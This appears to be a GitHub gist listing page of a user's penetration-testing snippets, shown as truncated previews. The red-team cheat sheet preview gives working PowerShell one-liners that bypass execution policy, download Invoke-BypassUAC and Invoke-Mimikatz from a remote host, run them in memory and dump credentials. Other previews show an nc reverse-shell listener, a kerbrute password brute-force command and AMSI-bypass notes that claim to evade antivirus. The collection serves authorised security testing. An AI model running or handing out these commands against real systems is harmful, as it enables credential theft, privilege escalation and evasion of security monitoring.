| title |
|---|
Windows Commands for Pentesters |
- Revshells
- shell one-liner
- Invoke-PowerShellTcp.ps1
nc -lvp 4444
Christian Bortone xybytes
xybytes
/ windows_commands_pentesting.md
Last active
August 27, 2023 16:10
Basic Windows CMD and PowerShell Commands for Pentester
xybytes
/ Get-SmbFiles.ps1
Last active
September 18, 2023 17:45
The PowerShell script is designed to retrieve files from a list of SMB shares.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| For a single share: | |
| Get-SmbFiles -SmbShare "\\server\share" | |
| For shares from a file: | |
| Get-SmbFiles -SharesFile "path_to_file_with_shares.txt" | |
| #> | |
| function Get-SmbFiles { | |
| [CmdletBinding()] | |
| param ( |
xybytes
/ RedTeam_CheatSheet.ps1
Created
September 17, 2023 23:19
— forked from jivoi/RedTeam_CheatSheet.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Description: | |
| # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
| # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
| # Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| # Import Mimikatz Module to run further commands |
xybytes
/ kerberos_attacks_cheatsheet.md
Created
September 17, 2023 23:20
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
xybytes
/ amsi-bypass.md
Created
September 17, 2023 23:21
— forked from D3Ext/amsi-bypass.md
All methods to bypass AMSI (2022)
To perform all this techniques you can simply try them by typing "Invoke-Mimikatz" into your powershell terminal, you'll notice that even if you haven't imported Mimikatz it will detect that as malicious. But if the AMSI is off or you avoid it, it just will say that "it's not recognized as the name of a cmdlet", so you could say that you've bypassed the AMSI
However some methods may be detected by the AV but most of them actually work without problem
The first and worst way to bypass AMSI is downgrading powershell version to 2.0.
xybytes
/ SharpHound.ps1
Created
December 22, 2023 00:35
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-BloodHound | |
| { | |
| <# | |
| .SYNOPSIS | |
| Runs the BloodHound C# Ingestor using reflection. The assembly is stored in this file. | |
| .DESCRIPTION | |
| Using reflection and assembly.load, load the compiled BloodHound C# ingestor into memory |
xybytes
/ BloodHound_Cypher.md
Created
December 24, 2023 02:48
xybytes
/ bloodhoundce_import.py
Created
February 26, 2024 17:53
— forked from aconite33/bloodhoundce_import.py
Import large files into BloodHound CE Edition
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import json | |
| import time | |
| import argparse | |
| import getpass | |
| import os | |
| import sys | |
| def main(): |
xybytes
/ Windows_Privilege_Escalation.md
Created
November 22, 2024 10:34
xybytes
/ oauth_authorization_code_flow.py
Created
February 27, 2025 21:14
Retrieve an OAuth 2.0 access token using Authorization Code Flow and call Microsoft APIs
OlderNewer